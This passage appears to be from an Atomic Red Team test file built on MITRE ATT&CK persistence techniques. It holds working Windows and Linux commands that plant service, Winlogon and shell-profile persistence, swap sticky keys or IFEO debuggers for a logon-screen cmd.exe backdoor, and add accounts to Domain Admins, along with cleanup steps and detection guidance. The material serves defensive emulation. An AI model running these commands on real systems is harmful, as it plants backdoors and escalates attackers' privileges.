- Tools such as Sysinternals Autoruns may also be used to detect system service - changes that could be attempts at persistence.(Citation: TechNet Autoruns) - \ \n\nCreation of new services may generate an alterable event (ex: Event - ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft - Windows Event Forwarding FEB 2018)). New, benign services may be created during - installation of new software.\n\nSuspicious program execution through services - may show up as outlier processes that have not been seen before when compared - against historical data. Look for abnormal process call trees from known services - and for execution of other commands that could relate to Discovery or other - adversary techniques. Data and events should not be viewed in isolation, but - as part of a chain of behavior that could lead to other activities, such as - network connections made for Command and Control, learning details about the - environment through Discovery, and Lateral Movement." - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Matthew Demaske, Adaptforward - - Travis Smith, Tripwire - - Pedro Harrison - identifier: T1543.003 - atomic_tests: - - name: Modify Fax service to run PowerShell - auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f - description: | - This test will temporarily modify the service Fax by changing the binPath to PowerShell - and will then revert the binPath change, restoring Fax to its original state. - Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. 
- supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: | - sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" - sc start Fax - cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul - 2>&1 - - name: Service Installation CMD - auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 - description: | - Download an executable from github and start it as a service. - Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_CMD - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: command_prompt - elevation_required: true - command: | - sc.exe create #{service_name} binPath= #{binary_path} - sc.exe start #{service_name} - cleanup_command: | - sc.exe stop #{service_name} >nul 2>&1 - sc.exe delete #{service_name} >nul 2>&1 - - name: Service Installation PowerShell - auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 - description: | - Installs A Local Service via PowerShell. 
- Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_PowerShell - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: powershell - elevation_required: true - command: | - New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" - Start-Service -Name "#{service_name}" - cleanup_command: | - Stop-Service -Name "#{service_name}" 2>&1 | Out-Null - try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} - catch {} - T1547.004: - technique: - created: '2020-01-24T16:59:59.688Z' - modified: '2020-04-21T16:00:41.277Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 - description: "Adversaries may abuse features of Winlogon to execute DLLs and/or - executables when a user logs in. Winlogon.exe is a Windows component responsible - for actions at logon/logoff as well as the secure attention sequence (SAS) - triggered by Ctrl-Alt-Delete. 
Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper - programs and functionalities that support Winlogon. (Citation: Cylance Reg - Persistence Sept 2013) \n\nMalicious modifications to these Registry keys - may cause Winlogon to load and execute malicious DLLs and/or executables. - Specifically, the following subkeys have been known to be possibly vulnerable - to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - - points to userinit.exe, the user initialization program executed when a - user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell - executed when a user logs on\n\nAdversaries may take advantage of these features - to repeatedly execute malicious code and establish persistence." - name: Winlogon Helper DLL - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.004 - url: https://attack.mitre.org/techniques/T1547/004 - - external_id: CAPEC-579 - source_name: capec - url: https://capec.mitre.org/data/definitions/579.html - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. 
- source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - x_mitre_detection: |- - Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. - - Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.004 - atomic_tests: - - name: Winlogon Shell Key Persistence - PowerShell - auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 - description: | - PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. 
- supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Shell" "explorer.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Userinit Key Persistence - PowerShell - auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb - description: | - PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Notify Key Logon Persistence - PowerShell - auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 - description: | - PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. - - Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. 
- supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of notification package to execute - type: Path - default: C:\Windows\Temp\atomicNotificationPackage.dll - executor: - command: | - New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force - Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force - cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" - -Force -ErrorAction Ignore - -' - name: powershell -persistence: - T1546.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.004 - url: https://attack.mitre.org/techniques/T1546/004 - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. - source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: ".bash_profile and .bashrc" - description: |- - Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. - - ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. 
This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. - - The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc. - - Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware) - id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:28:04.990Z' - created: '2020-01-24T14:13:45.936Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: While users may customize their ~/.bashrc and - ~/.bash_profile files , there are only certain types of commands - that typically appear in these files. Monitor for abnormal commands such as - execution of unknown programs, opening network sockets, or reaching out across - the network when user profiles are loaded during the login process. 
- x_mitre_data_sources: - - Process use of network - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1546.004 - atomic_tests: - - name: Add command to .bash_profile - auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f - description: 'Adds a command to the .bash_profile file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bash_profile file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> ~/.bash_profile - -' - name: sh - - name: Add command to .bashrc - auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f - description: 'Adds a command to the .bashrc file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bashrc file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> ~/.bashrc - -' - name: sh - T1546.008: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.008 - url: https://attack.mitre.org/techniques/T1546/008 - - external_id: CAPEC-558 - source_name: capec - url: https://capec.mitre.org/data/definitions/558.html - - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html - description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: - Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' - source_name: FireEye Hikit Rootkit - - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom - description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to - the Kingdom. Retrieved July 5, 2017. 
- source_name: DEFCON2016 Sticky Keys - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - source_name: Narrator Accessibility Abuse - url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html - description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' - URI for Fileless Persistence. Retrieved April 28, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Accessibility Features - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. - - Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) - - Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. 
In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. - - For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. 
(Citation: Tilbury 2014) - - Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) - - * On-Screen Keyboard: C:\Windows\System32\osk.exe - * Magnifier: C:\Windows\System32\Magnify.exe - * Narrator: C:\Windows\System32\Narrator.exe - * Display Switcher: C:\Windows\System32\DisplaySwitch.exe - * App Switcher: C:\Windows\System32\AtBroker.exe - id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-13T20:37:30.048Z' - created: '2020-01-24T14:32:40.315Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Changes to accessibility utility binaries or binary paths - that do not correlate with known software, patch cycles, etc., are suspicious. - Command line invocation of tools capable of modifying the Registry for associated - keys are also suspicious. Utility arguments and the binaries themselves should - be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Paul Speulstra, AECOM Global Security Operations Center - x_mitre_platforms: - - Windows - identifier: T1546.008 - atomic_tests: - - name: Attaches Command Prompt as a Debugger to a List of Target Processes - auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - description: | - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. 
- - Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. - supported_platforms: - - windows - input_arguments: - parent_list: - description: 'Comma separated list of system binaries to which you want - to attach each #{attached_process}. Default: "osk.exe" - -' - type: String - default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, - atbroker.exe - attached_process: - description: 'Full path to process to attach to target in #{parent_list}. - Default: cmd.exe - -' - type: Path - default: C:\windows\system32\cmd.exe - executor: - command: | - $input_table = "#{parent_list}".split(",") - $Name = "Debugger" - $Value = "#{attached_process}" - Foreach ($item in $input_table){ - $item = $item.trim() - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - } - cleanup_command: | - $input_table = "#{parent_list}".split(",") - Foreach ($item in $input_table) - { - $item = $item.trim() - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null - } - name: powershell - elevation_required: true - - name: Replace binary of sticky keys - auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - -' - supported_platforms: - - windows - executor: - command: | - copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe - takeown /F C:\Windows\System32\sethc.exe /A - icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t - copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe - cleanup_command: 'copy /Y 
C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - -' - name: command_prompt - elevation_required: true - T1098: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1098 - url: https://attack.mitre.org/techniques/T1098 - - source_name: Microsoft User Modified Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account - was changed. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 - - description: Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. - Retrieved November 4, 2019. - url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 - source_name: Microsoft Security Event 4670 - - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM - description: Warren, J. (2017, July 11). Manipulating User Passwords with - Mimikatz. Retrieved December 4, 2017. - source_name: InsiderThreat ChangeNTLM July 2017 - - url: https://github.com/gentilkiwi/mimikatz/issues/92 - description: 'Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm - work, but generate Windows events #92. Retrieved December 4, 2017.' - source_name: GitHub Mimikatz Issue 92 June 2017 - description: Adversaries may manipulate accounts to maintain access to victim - systems. Account manipulation may consist of any action that preserves adversary - access to a compromised account, such as modifying credentials or permission - groups. These actions could also include account activity designed to subvert - security policies, such as performing iterative password updates to bypass - password duration policies and preserve the life of compromised credentials. 
- In order to create or manipulate accounts, the adversary must already have - sufficient permissions on systems or the domain. - name: Account Manipulation - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-05T16:43:29.473Z' - created: '2017-05-31T21:31:12.196Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.1' - x_mitre_contributors: - - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) - - Praetorian - - Tim MalcomVetter - x_mitre_data_sources: - - Authentication logs - - Windows event logs - x_mitre_detection: |- - Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) - - Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. - - Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. 
- x_mitre_platforms: - - Windows - - Office 365 - - Azure - - GCP - - Azure AD - - AWS - - Linux - - macOS - identifier: T1098 - atomic_tests: - - name: Admin Account Manipulate - auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af - description: 'Manipulate Admin Account Name - -' - supported_platforms: - - windows - executor: - command: | - $x = Get-Random -Minimum 2 -Maximum 9999 - $y = Get-Random -Minimum 2 -Maximum 9999 - $z = Get-Random -Minimum 2 -Maximum 9999 - $w = Get-Random -Minimum 2 -Maximum 9999 - Write-Host HaHa_$x$y$z - - $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name - - foreach($member in $fmm) { - if($member -like "*Administrator*") { - $account = $member.Name -replace ".+\\\","" # strip computername\ - $originalDescription = (Get-LocalUser -Name $account).Description - Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description - Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation - Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME - } - } - cleanup_command: | - $list = Get-LocalUser |?{$_.Description -like "atr:*"} - foreach($u in $list) { - $u.Description -match "atr:(?[^;]+);(?.*)" - Set-LocalUser -Name $u.Name -Description $Matches.Description - Rename-LocalUser -Name $u.Name -NewName $Matches.Name - Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME - } - name: powershell - elevation_required: true - - name: Domain Account and Group Manipulate - auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 - description: "Create a random atr-nnnnnnnn account and add it to a domain group - (by default, Domain Admins). \n\nThe quickest way to run it is against a domain - controller, using `-Session` of `Invoke-AtomicTest`. 
Alternatively,\nyou need - to install PS Module ActiveDirectory (in prereqs) and run the script with - appropriare AD privileges to \ncreate the user and alter the group. Automatic - installation of the dependency requires an elevated session, \nand is unlikely - to work with Powershell Core (untested).\n\nIf you consider running this test - against a production Active Directory, the good practise is to create a dedicated\nservice - account whose delegation is given onto a dedicated OU for user creation and - deletion, as well as delegated\nas group manager of the target group.\n\nExample: - `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and - Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n" - supported_platforms: - - windows - input_arguments: - account_prefix: - description: | - Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on - a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. 
- type: String - default: atr- - group: - description: Name of the group to alter - type: String - default: Domain Admins - create_args: - description: Additional string appended to New-ADUser call - type: String - default: '' - dependencies: - - description: 'PS Module ActiveDirectory - -' - prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop - | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" - get_prereq_command: | - if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { - Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online - } else { - Install-WindowsFeature RSAT-AD-PowerShell - } - executor: - command: | - $x = Get-Random -Minimum 2 -Maximum 99 - $y = Get-Random -Minimum 2 -Maximum 99 - $z = Get-Random -Minimum 2 -Maximum 99 - $w = Get-Random -Minimum 2 -Maximum 99 - - Import-Module ActiveDirectory - $account = "#{account_prefix}-$x$y$z" - New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} - Add-ADGroupMember "#{group}" $account - cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" - | Remove-ADUser -Confirm:$False - -' - name: powershell - T1098.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.003 - url: https://attack.mitre.org/techniques/T1098/003 - - source_name: Microsoft Support O365 Add Another Admin, October 2019 - url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d - description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. - - source_name: Microsoft O365 Admin Roles - url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide - description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. - al.. (2019, October 8). About admin roles. Retrieved October 18, 2019. 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Add Office 365 Global Administrator Role - description: "An adversary may add the Global Administrator role to an adversary-controlled - account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft - Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin - Roles) With sufficient permissions, a compromised account can gain almost - unlimited access to data and settings (including the ability to reset the - passwords of other admins) via the global admin role.(Citation: Microsoft - O365 Admin Roles) \n\nThis account modification may immediately follow [Create - Account](https://attack.mitre.org/techniques/T1136) or other malicious account - activity." - id: attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T12:40:02.331Z' - created: '2020-01-19T16:59:45.362Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Collect usage logs from cloud administrator accounts to - identify unusual activity in the assignment of roles to those accounts. Monitor - for accounts assigned to admin roles that go over a certain threshold of known - admins. ' - x_mitre_data_sources: - - Office 365 audit logs - x_mitre_contributors: - - Microsoft Threat Intelligence Center (MSTIC) - x_mitre_platforms: - - Office 365 - atomic_tests: [] - T1137.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.006 - url: https://attack.mitre.org/techniques/T1137/006 - - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460 - description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017. 
- source_name: Microsoft Office Add-ins - - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ - description: Knowles, W. (2017, April 21). Add-In Opportunities for Office - Persistence. Retrieved July 3, 2017. - source_name: MRWLabs Office Persistence Add-ins - - source_name: FireEye Mail CDS 2018 - url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf - description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! - Enterprise Email Compromise. Retrieved April 22, 2019. - - source_name: GlobalDotName Jun 2019 - url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique - description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Add-ins - description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence - on a compromised system. Office add-ins can be used to add functionality to - Office programs. (Citation: Microsoft Office Add-ins) There are different - types of add-ins that can be used by the various Office products; including - Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object - Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools - for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office - Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used - to obtain persistence because they can be set to execute code when an Office - application starts. 
" - id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:34:02.877Z' - created: '2019-11-07T19:52:52.801Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Windows Registry - - Process monitoring - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1098.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.001 - url: 